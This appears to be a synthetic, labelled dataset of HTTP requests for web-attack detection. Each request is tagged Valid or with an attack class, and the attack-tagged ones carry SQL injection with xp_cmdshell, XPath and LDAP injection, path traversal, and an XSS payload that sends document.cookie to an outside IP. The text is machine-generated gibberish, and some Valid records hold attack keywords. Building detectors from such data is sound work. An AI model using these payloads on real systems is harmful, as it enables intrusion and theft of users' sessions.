End - Id: 3046
Start - Id: 379
class: Valid
GET /lgMrCRjjO@q5WZpy9vdl/sC0RmVPg3Lauc5mfbxy/tz/Ic/nrndst3Mihi/oCYtJTPm2QgOE/hie6eodttslterrtAle.php4?vu=w%3Dn&joaaetyiiaen=jobanrsdtwaoqm%40nce&orttecthiqh=987&mvaTxP2M=uRx7&caSnavAMPas=TeT5bea%25h&isT=%3Boyo&@8QO2=eNGJQ HTTP/1.1
Host: 16.63.253.40:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1257, x-mac-chinesesimp;q=0.9, iso-8859-6;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: s4cyld7-wnlt5plD;q=0.5
Cache-Control: no-transform
Client-ip: 68.69.216.23
Cookie: xG3fwtEde=ldtsinclude71+ioytrasmaa5 ;ae=24716643;ztnixog1=sNA@etea0pq
Cookie2: $Version="75"
Date: Sat, 11 Sep 04 10:31:24 GMT
ETag: W/"qN046fEpv6REy5KApOF"
Expect: caxlro
From: DbbWly@nefyhddm.ch
If-Modified-Since: Thu, 15 Jun 06 03:54:40 UTC
If-Unmodified-Since: Fri, 26 Nov 04 04:50:43 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 05 May 04 04:43:42 CET
Max-Forwards: 683
MIME-Version: 0.4
Pragma: mr4n='tre'
Proxy-Authorization: Digest username="iWrams"
Authorization: NTLM UnBydWNlM25oZXRyZTJNM2FzaWNvbmFrSXBoRXRzeXVxdGJlbzVrbnJk
Range: 541443-68,844-,77-861439
Referer: /Sotns/bnhnE/lwat.jsp
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: ei7ohiil (9l5WHHTKl3; ha0kKvE; jMGhTalca)
UA-CPU: x86
UA-Disp: 4410,166,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0511x714
Via: lealds/9.9 www.agimt.js:297, FTP/4.4 www.oeBsisa.htm, 1.6 www.zy4gk.jpg
Transfer-Encoding: deflate
Upgrade: tohb/5.5, wosd/8.3, a7t/8.4
Warning: 019 www.rqism.png "eeerrEetourerTuu" 
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 8963689877727
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 379
Start - Id: 228
class: Valid
GET /ddselhIy/d3p/sDfrdtMRe/dF4AdPCswmYmH5vv/nph-LxcK6.-sjJ6OUI/ePoPyv4kHFg5nCgmv-/wiereeadahod/yliNna.htm? HTTP/1.0
Host: www.ntefuer8sx.de:80
Connection: close
Accept: */*
Accept-Charset: us-ascii, koi8-r;q=0.0
Accept-Encoding: 
Accept-Language: 5-fn, lre5th-frmtaali, IhOuvryi-do6Ed, hdhor-mx;q=0.7
Cache-Control: no-store
Client-ip: 99.49.237.73
Cookie: ohmoa=Rori~lra/nNs ;rm=42
Cookie2: $Version="27"
Date: Fri, 20 Aug 04 15:45:22 CET
ETag: "isEz1WpfU9Phbh11J1p"
Expect: 100-continue
From: 0doILoeo@uhagi7pind.be
If-Modified-Since: Thu, 27 Aug 09 17:55:36 GMT
If-Unmodified-Since: Mon, 09 Aug 04 04:43:29 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 26 Jan 06 09:43:36 CET
Max-Forwards: 928
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic ZXRlc2c0OmFwaWNn
Authorization: payb aRaonr=30ei
Range: 46-,9-788359,-8100
Referer: /NLy7mw/etzluOs/poCIoh/9t9ath/7pdAe1I9.gif
TE: deflate,deflate,trailers
Trailer: From
User-Agent: toesst/7.5.6.4.2
UA-CPU: StrongARM
UA-Disp: 2677,740,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4314x599
Via: 5.3 www.ghepngin.png, 6.0 16.163.39.67:7877, 8.6 125.137.94.253
Transfer-Encoding: gzip
Upgrade: tden/0.3, ytuoof/6.0, Hl57r/7.7
Warning: 582 65.217.95.237 "athescdhZEt" "Fri, 04 Nov 05 16:53:44 UTC"
X-Forwarded-For: 73.229.35.89
X-Serial-Number: 543176646473
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 228
Start - Id: 874
class: Valid
GET /go6GB/UwxfMZNzC1pc/apoebs/pWeRRzc/tRmq.c3abRwun-1hK2/tbP/axnacu7sah/r-1osv02t9mJKfL7i9cv/ae/xpgtZNHUCdN_kand/hI/hecdrctain.cgi?nsaac5aenp=s2nu&lotnyynls=88685&_i-i0aconnectQNBpsBm=h8Gk0T_gh&lhowm=i%5Dohntten%29etnsi&HKU.81wgetxNY=8&9tZWG=catobit&0e=911197&iqkrtqo=i%2B%2474emsystemt%28zWgelea+f%26&een7eamhS=tswg8knhdr&wG8nrsiB=917&fH8A5=amTdp.Jh1J&R.@unionkJc4t6A=19160&wzssoeopatng=40 HTTP/1.0
Host: www.atjnzeeNul.biz:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-9
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=104
Client-ip: 221.84.191.94
Cookie: etaauerlxCtl3=5;dXLvchavingc5p=521604;ctamrfly=kbI
Cookie2: $Version="3"
Date: Mon, 11 Feb 08 14:09:44 CET
ETag: W/"0UHLnbcZRZDpejE"
Expect: 100-continue
From: eboyso@usT0nl.gov
If-Modified-Since: Wed, 07 Sep 05 05:44:38 UTC
If-Unmodified-Since: Sat, 06 Jan 07 10:42:37 UTC
If-Match: *
If-None-Match: "G6_pQ_bJy_DMNXPH"
If-Range: Sun, 28 Dec 08 17:45:01 GMT
Max-Forwards: 27
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: f7unni sbanC=9s6dad
Authorization: NTLM dGFiZWVvaXRTb3NpOWhvb2FlZXZub3VjaG5Dc3IzeW9pdHFsbA==
Range: 95471-
Referer: /aieest.avi
TE: deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/8.2 (compatible; MSIE 1.5; WinNT; b5nfeSt7q; uwiduskr4; siafoq)
UA-CPU: Sparc
UA-Disp: 1675,0086,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 130x106
Via: 3.8 www.wille.jpg, HTTP/8.8 176.238.17.99:94, 8.7 78.71.5.139
Transfer-Encoding: etsne3
Upgrade: 7hee/2.9
Warning: 365 118.102.144.238 "T2htwaueRex7" 
X-Forwarded-For: 44.170.70.161
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 874
Start - Id: 48520
class: XPathInjection
POST /aMesP8IDp@@eDr@AqLaV/9LlHRlXL/5i58hJoeantlnczom/6tnlosFM/yU.gif? HTTP/1.0
Content-Length: 408
Content-Language: 8ndi,orLt
Content-Encoding: deflate
Content-Location: /phslco7/ab8zr/nebnrs/lrwiare.css
Content-MD5: dGF0bXJlbnJvdGxyTnBscg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 May 10 21:08:21 UTC
Last-Modified: Wed, 20 Sep 06 17:06:54 UTC
Host: 0.14.204.86
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-4;q=0.7, big5;q=0.2
Accept-Encoding: compress;q=0.7, compress;q=0.6, identity;q=0.0, compress, deflate;q=0.2
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 221.85.134.126
Cookie: lwer7kot=triperlefoeecy2rmzlrn
Cookie2: $Version="7"
Date: Wed, 18 Jan 06 10:03:01 UTC
ETag: "QGySzSQMbkDL5SpLi"
Expect: pdaiytge=ttintxkT;rkEAm
From: ihJ5ekit@y1isB05.uk
If-Modified-Since: Mon, 13 Apr 09 16:24:29 UTC
If-Unmodified-Since: Fri, 16 Apr 10 09:05:13 UTC
If-Match: *
If-None-Match: "CRF7bM-U7NLhH0jfaJvj"
If-Range: Tue, 30 Mar 04 24:54:00 GMT
Max-Forwards: 78
MIME-Version: 0.8
Pragma: cfAec=y
Proxy-Authorization: Basic ZXNycGVkOmNxbU8=
Authorization: dLedL1 9at7e=pu3pp5
Range: 811682-312,0-
Referer: /munix9e/lCe23t/oTtnm/Xera9sc/esrreet.png
TE: deflate;q=0.5
Trailer: Max-Forwards
User-Agent: fsos5jbso (e6WkseO)
UA-CPU: Sparc
UA-OS: Solaris
UA-Pixels: 7707x473
Via: 0.9 48.90.143.119
Transfer-Encoding: deflate
Warning: 573 237.6.171.121 "raj7gtRiqro3fant1ld" 
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

oShsucooFijn0=Yxwel5aqlarTiac&hn=iARTyvA0reme&ne3o3=nd4nf&e09lN1mnn=heolExsfrg5tPshle&zdf=noh>nctfeandot&trN3hheacarawr=t&wdaEseetotbai=qfromfVoeHrrl;ndtagt b&qaat8f=098270&Mha8dIjqenjerdp=btn9'    or    1et3o/7Vhni2/child::node()[processing-instruction()=62]     or    'yisAm'    =   '&xphpwinntq-Mketcwp-W=oWU4ftdD&89hUid=oic8uhoXFaV&tb=35529339&Bkdthupdatelocation=kgl 

End - Id: 48520
Start - Id: 23644
class: Valid
GET /8pRJ8Nqpositionwinnthavingo/3y/szdYKBuA_40jaO/aael/tSmPDxx@qqyC7u/n@-8ZeB_P2Q_sRt/2nrsfTluLl5n/t@Tm.b14c/ndldjitmetoHsthmer3u/nNcx-aUlrU0bPn.tiff?documentQopnApZwZj1=286740737&iipilhOw=tb-%40T0Vp8H&raiayies6=26661445&IghscsehRbE2=ncd&ota4acoTrNtconM=602759&edhHk=unionot%25eeo&u5iteposei=oeo3femsshlorwustr&egn=bodyl&ohalS1azt7t=dieitdsamrcatfmochaom&tenaeizoe=Ahbofhtlscriptno%3Ca9b+%3ErO&IeeauuajrQeE=As2hacruuol&fnh1FzUi5n3=et%5C%3Cftp+rhasnn4tiil HTTP/1.0
Host: www.iur3bii.com
Connection: close
Accept: application/postscript
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=940
Client-ip: 229.91.156.23
Cookie: e3d=2O-2c9;Hnq=bodyjtpir2@E;iohh=1030475418;gjitqnwts=3;oilemld=327099
Cookie2: $Version="1"
Date: Wed, 09 Feb 05 10:37:59 GMT
ETag: "XIQI_03OH24JNGEZ"
Expect: 100-continue
From: 91yr@3eph1.it
If-Modified-Since: Tue, 13 Mar 07 10:06:53 CET
If-Unmodified-Since: Sun, 20 Nov 05 19:10:27 UTC
If-Match: "8HbkwbvAQm_NFiCy"
If-None-Match: "Hojfog6UhpsO1TeE08"
If-Range: Sat, 10 Apr 04 10:12:14 UTC
Max-Forwards: 193
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: ts2t eudaha=Usambx
Authorization: nbti mzy0s=ieih
Range: -165228,-5,-497919
Referer: http://kr6ea5SN.gov/8dovetee/tAa7u4rr/qutoePa/wHct/eBet3.tiff
TE: chunked
Trailer: Referer
User-Agent: 1odeem6/5.7.5.0
UA-CPU: PowerPC
UA-Disp: 307,9074,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 361x375
Via: aiLat2/6.4 www.oLnno.html, HTTP/9.6 95.35.104.121, 0.5 228.135.233.156
Transfer-Encoding: gzip
Upgrade: eqa/3.4, 6rIn/9.3
Warning: 121 www.uloio.gif "dae4cslezep1pcddhxee" "Fri, 17 Dec 04 20:23:59 GMT"
X-Forwarded-For: 102.8.0.254
X-Serial-Number: 13224
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23644
Start - Id: 40969
class: SqlInjection
GET /qhI@/tmdK.XRCbbyUt3S-nN/aIC53/iuTrE9g@iYXXtQQpGk/C@WpmVSperlXq0d/06wX4RZH.yNVX.shtml? HTTP/1.1
Host: www.ypkaip.net
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.8
Accept-Language: ';EXECmaster.dbo.xp_cmdshell'cmd.exe
Cache-Control: min-fresh=1460
Cookie2: $Version="34"
Date: Sat, 09 Jan 10 17:37:44 UTC
ETag: "Kf@7..91LZ5JErV-"
If-Modified-Since: Wed, 16 Nov 05 12:58:56 CET
Max-Forwards: 2988
Referer: /northm/worcnnt.shtml
User-Agent: nalgt5 http://www.0tbims.com
Via: 8.0 www.jmwsAh.html, HTTP/1.4 15.245.55.89
Warning: 891 www.Dgnneo.png "tgConortovhrr" 

null

End - Id: 40969
Start - Id: 24591
class: Valid
GET /h-Sx8yc2.BgPiKj1-N.shtml?edr=eg&6Yobject-.4XOC.Cb=8alinkI&tr6soi=auiz5a%26nb3p&nSIx=1&aun=oeGZ&h54et=uDgSvxnx HTTP/1.1
Host: 215.73.200.35
Connection: keep-alive
Accept: text/*;q=0.1
Accept-Charset: x-mac-korean
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 144.153.248.99
Cookie: eorrvaSSco0pidt=945;taieoh7qa0Np0a=luhmvout6tdRkuflt;twhobferc1nuadp=svo/;KzVobjectCN=erhmoa;al4iWb3nrvlrl7w=hHbwhen
Cookie2: $Version="9"
Date: Sun, 13 Aug 06 01:57:13 UTC
ETag: W/"4dS.u20O0Z3P8h."
Expect: eeEemis
From: teiet4@sTvons.de
If-Modified-Since: Wed, 13 Jan 10 21:23:24 UTC
If-Unmodified-Since: Sat, 22 Jul 06 18:37:42 CET
If-Match: *
If-None-Match: *
If-Range: "EA41uCJOkJ02D5qWOL.T"
Max-Forwards: 0
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic ZWhUTzpqaFF0bGQ=
Authorization: Digest qop=auth
Range: 5150-,581355-
Referer: http://antE4dnu.cz/zotNk/u5etf/EgCit8.tiff
TE: trailers
Trailer: Host
User-Agent: r9oso (c3-M@@jP4; nN2Gpc)
UA-CPU: StrongARM
UA-Disp: 1118,7867,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 699x848
Via: 8zHu/9.9 95.156.66.102, HTTP/2.4 www.vrelem.png
Transfer-Encoding: y3eyt
Upgrade: maOeS/3.9
Warning: 152 www.ooridO.gif "UeeEwtsltb3wwa8sst8o" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 0368215317608
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24591
Start - Id: 29847
class: Valid
GET /hILXo/tlesylto4/a6My/zfdropOGLb6y/sEi41bB7/ote/mS1a._9TjbXMd7i37mZ/eMst3qUGF0gNMysn0b/fEVFsDWomUR.in7IVOa@/t2Yy.cfm?teren=ljWTeM8&5yetew=Ss%2Bs HTTP/1.0
Host: 163.27.30.140
Connection: keep-alive
Accept: video/quicktime;q=0.9, application/postscript;q=0.5
Accept-Charset: x-mac-arabic
Accept-Encoding: 
Accept-Language: 6uir-uujle, spEb8Wk-Tp, N6sah-70da;q=0.1
Cache-Control: no-store
Client-ip: 156.80.149.37
Cookie: sTedtoMd4dawx=00;edefnlTy=% 5wbpasswdrddrm 50optsdrtse;yFpRtI1veAm3=8906211520;6za0hkWreoLhito=ue2% g0nF(e<sitwwp
Cookie2: $Version="15"
Date: Sat, 20 Oct 07 13:10:44 CET
ETag: "@gK32FEl6CSJFc9aq1"
Expect: 100-continue
From: hggtsom6@ieylr.uk
If-Modified-Since: Sun, 04 Jan 04 15:33:31 GMT
If-Unmodified-Since: Tue, 28 Dec 04 20:19:23 CET
If-Match: "2XQII5eVtvPwLZB"
If-None-Match: "p7-9FP.SjuLOqF-"
If-Range: Sun, 28 Aug 05 19:59:12 CET
Max-Forwards: 839
MIME-Version: 6.7
Pragma: nNagdhfc=pn3v
Proxy-Authorization: NTLM ZXNZaWVxQmRlZXljbWRpMWlxbW5lOW14Y2M4dW5SRWN6YXRlZWNzdG1zN2U=
Authorization: n8gso ixtifvEe=saeour
Range: -58988,5-,282881-
Referer: /e4qice/jzapta/dalmit.mp3
TE: deflate,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/1.8 (Windows; U; Win 9x 6.2; ia-dE; rv:1.5.5) Gecko/53794794
UA-CPU: x86
UA-Disp: 724,467,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 952x914
Via: 7.8 126.10.239.101:64, 7.7 105.67.126.185
Transfer-Encoding: identity
Upgrade: exm/3.9, rRT/2.7
Warning: 996 159.207.202.137 "iaerlerhnkonrlcof" 
X-Forwarded-For: 87.103.209.5
X-Serial-Number: 74374524657
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29847
Start - Id: 45174
class: PathTransversal
GET .////////////////////////? HTTP/1.0
Host: www.9grt.uk
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i
Accept-Encoding: *;q=0.8
Accept-Language: er-d, n-pknbv;q=0.4
Cache-Control: no-transform
Client-ip: 49.63.221.221
Cookie: eOssErdweHee2tl=CeINrafoeoe8tos;gsoe8= ]en/oirhveagroup byaddimgcsS
Cookie2: $Version="339"
Date: Thu, 11 Dec 08 01:20:07 CET
ETag: W/"nusweEuleB7R8Ih"
Expect: sozKtin=eeRl
From: eeatnnio@srlvirtei.ch
If-Modified-Since: Tue, 20 Apr 04 11:47:43 UTC
If-Unmodified-Since: Tue, 02 Oct 07 19:20:38 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 748
MIME-Version: 0.7
Pragma: upgnwx='vssk'
Proxy-Authorization: Digest nonce
Authorization: ttiwh soogktu=nltw
Range: 551-3881,-846
Referer: /tirwip.png
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: Mozilla/5.6 (X11; U; SunOS sun4u 0.2; dt-nb; rv:2.2.7) Gecko/36857828
UA-CPU: StrongARM
UA-Disp: 133,5622,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1177x8327
Via: HTTP/2.7 www.gsleefo.jpeg, FTP/8.3 175.148.5.151
Transfer-Encoding: identity
Upgrade: eeseac/5.7, gAc/5.7, neo8/2.4, a6had/5.2
Warning: 731 www.s1twimt.js "shcldhaeymHeqh" "Wed, 16 Mar 05 01:22:20 GMT"
X-Forwarded-For: 249.70.128.210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45174
Start - Id: 47909
class: XSS
GET /lHI@P/ehos5ario6mnsfee9/td/vrFtK_iI0pZJLiW/bHwJuOwindow.openfromMlCkxN/hHIh3/TNRG/oGT-9nH8/atHaSXx0H8Rd10.msf?slededifriei=htaccesth5hfnb%27a0phpv&h6MeiOrao=%3C%2F+eswfromreaftpr+h%29sd%3Awget&qXuorNq=22530&em=46&h7WIrtueneryrdo=%3Ca+++++href++++%3D++++%22+javas%26%2399%3Bript%26%2335%3B%5Bwindow.open%28%27http%3A%2F%2F219.100.36.103%2Fanenet.mspx%27%2Bdocument.cookie%29%3B%5D+%22+++%3E&a73a=751&rFaoe8sosymc=9535164&eopennodeXJ3_=fht6n3rlr8ipuau&HS=r%3D HTTP/1.1
Host: www.dxrowhft.st
Connection: close
Accept: audio/basic;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 93.12.193.202
Cookie: Rktneo5azb=z;ecelrdeji0o6osC=t5ea7dU1p;oealOtscd9t5=oftuk64guaatyexeno;tT=allychildma
Cookie2: $Version="6"
Date: Mon, 11 May 09 09:18:58 CET
ETag: "ifdVZPaP60cBTA8HNdjF"
Expect: nlrwmq
From: rigu@deao.net
If-Modified-Since: Sat, 21 Mar 09 13:22:19 UTC
If-Unmodified-Since: Sat, 13 Aug 05 06:40:41 GMT
If-Match: "T9_Qd8iIpYqOkC3m"
If-None-Match: "7eTlV5zANGR_DRZJR9-"
If-Range: Sun, 18 Apr 10 18:08:04 CET
Max-Forwards: 3
MIME-Version: 8.4
Pragma: rlyn=darlboj0
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: Digest realm
Range: -419,3-
Referer: http://mmaanlx.org/e4anhhab/potdh.css
TE: gzip,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.8 (X11; U; Open BSD i386 2.1; 43-es; rv:4.3.0) Gecko/95191071
UA-CPU: x86
UA-Disp: 1161,524,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 229x467
Via: 2.8 www.lsffikew.jpeg, 1eefe/4.1 www.A89m.gif, HTTP/9.0 217.16.173.81
Transfer-Encoding: 4ahRe; nsfv=sEt8n
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 342 www.a3Idnne.js "aeea" "Tue, 23 Feb 10 05:56:33 UTC"
X-Forwarded-For: 90.98.250.32
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47909
Start - Id: 38012
class: LdapInjection
GET /eftn5ien6udwse7fE/u5THr73Q/s10thgo5O8pY4eG3u.jpeg?i0ofuilzhdto5ok=%29+++%28++++%7C++++%28hroa9%3Dzan*%29&wvk78srrh=610&tvexQam=h_ZmYSvhg&eQiy=bDNohaarelcatea&PZR42=j24C&erals=rrBlcfssHni+e&timeaoaauth=processing-instructionEna%25ueelwwt&TMHX8fVk=nQFPDvf HTTP/1.0
Host: www.lp1enac.com:80
Connection: close
Accept: application/x-tar;q=0.6
Accept-Charset: windows-1258, iso-2022-kr;q=0.2
Accept-Encoding: *
Accept-Language: ho-Acge, sainj2i-kNh;q=0.5, obuntn-mhtg;q=0.8
Cache-Control: max-age=869
Client-ip: 204.64.18.91
Cookie: cat_GnslYNCAupdate=9ahhnr;rtanas1Rereree=:6ut;ZtUiSG=cJVUu;Fac2Si_wfR=c6iueeednt
Cookie2: $Version="949"
Date: Sat, 26 Jan 08 13:26:10 GMT
ETag: "FpA_UeDHlRzDYzb"
Expect: hAenvtnw
From: 8nlhbept@3gle.ch
If-Modified-Since: Thu, 19 Mar 09 14:10:48 UTC
If-Unmodified-Since: Tue, 20 Oct 09 06:35:53 GMT
If-Match: *
If-None-Match: "T4Qm1gkh6lXWW_0H4_"
If-Range: Wed, 14 Apr 10 07:58:20 GMT
Max-Forwards: 2406
MIME-Version: 8.2
Pragma: dsier=iphxe
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: NTLM b2VudUVwaGV0dTRwb2V0Z3RIaW84YXRlZTFybWltaVRyQThvZXRn
Range: 089-,-9101
Referer: /Idvhyode/nerc1/wEetohh.aspx
TE: deflate;q=0.8
Trailer: If-None-Match
User-Agent: aPoswSAC http://www.trn6Rrpp.net
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 905x8185
Via: FTP/1.0 www.sllm6hM.gif
Transfer-Encoding: gzip
Upgrade: obs/0.4, gbr/5.8
Warning: 461 www.3izrso.tiff "rrcdd92qh0Axrii" 
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38012
Start - Id: 5301
class: Valid
PUT /L0P2dz@wursaccess_logQ/aaAjl/tJ6qmzRNzFIi2u/uU4S96SM4/etzwr4eT7slnms3a/nZxYLKb6CCYIWx.cgi? HTTP/1.1
Content-Length: 157
Content-Language: fs,aoeq2Te,egNicff
Content-Encoding: identity
Content-Location: http://ktueOe3c.biz/djo7fbne/aktmh/pous.ace
Content-MD5: eGxkcnNiY2hiZW5jcDJjeg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 30 Jul 05 14:18:07 GMT
Last-Modified: Wed, 10 May 06 05:48:24 GMT
Host: www.Cnllqi.com
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: 9isfel-i9izohse;q=0.5
Cache-Control: only-if-cached
Client-ip: 32.242.144.60
Cookie: zddNae=00084
Cookie2: $Version="0"
Date: Mon, 09 Aug 04 18:26:13 UTC
ETag: "E5XnrAkktMfZU47qaS"
Expect: enfl
From: naRoHav2@prVrEyldam.com
If-Modified-Since: Wed, 12 Oct 05 06:22:14 CET
If-Unmodified-Since: Fri, 30 Apr 04 08:04:08 GMT
If-Match: *
If-None-Match: "x0Ji1ud_8WhxcRMX"
If-Range: *
Max-Forwards: 982
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest username="tsbhdh"
Authorization: NTLM bmRtZUhrZWlscGVJdXZ1c2xkZUFlYWVmbmhldzlvbmVpcg==
Range: 8822-34,539805-
Referer: /lrxn/sehr1se/dhIiet/t5Aca/sjnatb.css
TE: gzip;q=0.2,trailers,chunked;q=0.3
Trailer: If-None-Match
User-Agent: u8srOe27/8.3
UA-CPU: 68000
UA-Disp: 370,737,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 1146x7241
Via: 8.5 168.143.193.195, 9.2 www.eotbt.jpg, 5.6 174.92.189.169
Transfer-Encoding: compress
Upgrade: s6e/1.2, nTe/7.0, nedeCt/2.1
Warning: 218 43.28.61.59 "ovEe0ysqedar" "Wed, 21 Apr 10 15:43:26 GMT"
X-Forwarded-For: 86.174.5.96
X-Serial-Number: 6090087986849
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

es=tbDY&JBzp2group by=egiqo7&temtbaxtt=097&optn=375599&oeHttgerfpEnoi2=96361&npeejesenvgop=snc&aotn883tre8hm=;t8rs Ps&oohrH7nopca=Howandnvtt  tiBrm|ir?

End - Id: 5301
Start - Id: 8268
class: Valid
GET /HSfb_dY%u5/2fAnr4owcGgsredarbde/nftoo2haime/to/wI1XTE9V9kZv/nruAGb-J01ZvWc/wDiJrOzx.-PPWffJ/demhpxch8bTiEK.jpg?eessrsht=512&clea6tkgneprbuj=yUhw4&iEaen=passwdminj6crrhpei HTTP/1.1
Host: 31.135.212.170
Connection: jn0i
Accept: image/png;q=0.8, text/html
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: aiO=ifSet
Client-ip: 122.138.97.126
Cookie: S3ywtIogteqn=ee8tjii2we;iOddivEF=larYhae5nauqeimtto
Cookie2: $Version="65"
Date: Wed, 17 Feb 10 08:50:18 UTC
ETag: ".Xq_e.D36F0CLCo9e"
Expect: 100-continue
From: teSs@0iptauimo.cz
If-Modified-Since: Tue, 20 Dec 05 12:28:14 GMT
If-Unmodified-Since: Mon, 22 Oct 07 06:51:13 CET
If-Match: "9vqsV@CzYPHFnDM6"
If-None-Match: "_s-iuSsY7W2kBiHFwRn"
If-Range: Sat, 21 Jun 08 17:05:16 UTC
Max-Forwards: 53
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: l6sult ptotur=gueoiO
Authorization: NTLM YnB5bm9vbWxvcnJlaHN4bzlnc2Nkbjdlc2kwZndhamFiNHBwcW1MZFVwdWNB
Range: -9
Referer: /elelhk/eduhEdeu/iecb/nwircos2/lseOe6ea.avi
TE: deflate;q=0.3,deflate;q=0.9
Trailer: Authorization
User-Agent: Mozilla/7.4 (Machintosh; U; PPC Mac OS X 7.5; tM-ao; rv:2.5.9) Gecko/45505985
UA-CPU: Sparc
UA-Disp: 260,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 833x678
Via: 0.6 www.wma0.css:559, 7.7 91.221.237.206
Transfer-Encoding: compress
Upgrade: r88e/3.1, eipneG/6.0, tm7/7.0, feaq/2.0, Fat8/9.6
Warning: 511 www.4eiedl.jpg "iyeseuen99unse7mytth" 
X-Forwarded-For: 180.145.13.167
X-Serial-Number: 07344757970707367
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 8268
Start - Id: 38075
class: LdapInjection
GET /adoodseds/tcXrctGk4ei/iq/aMp0a8PdZbacmdXD/87t.bin?tneri=netemeta%27vbscriptspositionp&zqdMSO=1562493&1Osc-4=oeb0de&aduToEbl6uv=HnetcatGNneuh&lteAec=eeccdtnsfgjSsn&ocdguTkr=56&izese5s9qasXiao=seetemkbmee&OoIeYs=bo6%7C&seoohsdnfoTsal=983&oslonbebasr=objectg%3C%2Ff2euchOL&sQsjS=ek%3DhId&knOotwRioSl=gOv4Km6SJOos&eeQt7GawDeicc=8e&8_3x4=5lsr%29%28%26%28objectClass++++%3Dyfee*%29 HTTP/1.0
Host: www.urdoDwoait.be:38674
Connection: leaeut
Accept: video/*, image/*
Accept-Charset: *;q=0.4
Accept-Encoding: identity, gzip, identity, deflate;q=0.8
Accept-Language: ejnn-MlrenC4;q=0.3, Q-9leS, D-aSs, i-1ncy7c, n9lnUt-ortrii
Cache-Control: only-if-cached
Client-ip: 43.210.102.87
Cookie: X-TUfd4MJv=libEsr;tums=hQvd9
Cookie2: $Version="57"
Date: Mon, 29 Mar 10 09:19:02 CET
ETag: W/"D8v7C-3-pg8qmVMX1v"
Expect: 100-continue
From: zfmmsal@ymhqo.ch
If-Modified-Since: Mon, 26 Oct 09 16:20:08 CET
If-Unmodified-Since: Fri, 24 Mar 06 21:58:09 CET
If-Match: *
If-None-Match: "yuq1tL.EAN1VUrhnKPTU"
If-Range: "FmJxizBZzLrlYbp@efNj"
Max-Forwards: 083
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic cm5pZXVqOmh0bXM=
Authorization: Basic dGpvZURvOnZmYXN1N20=
Range: 77-,76-
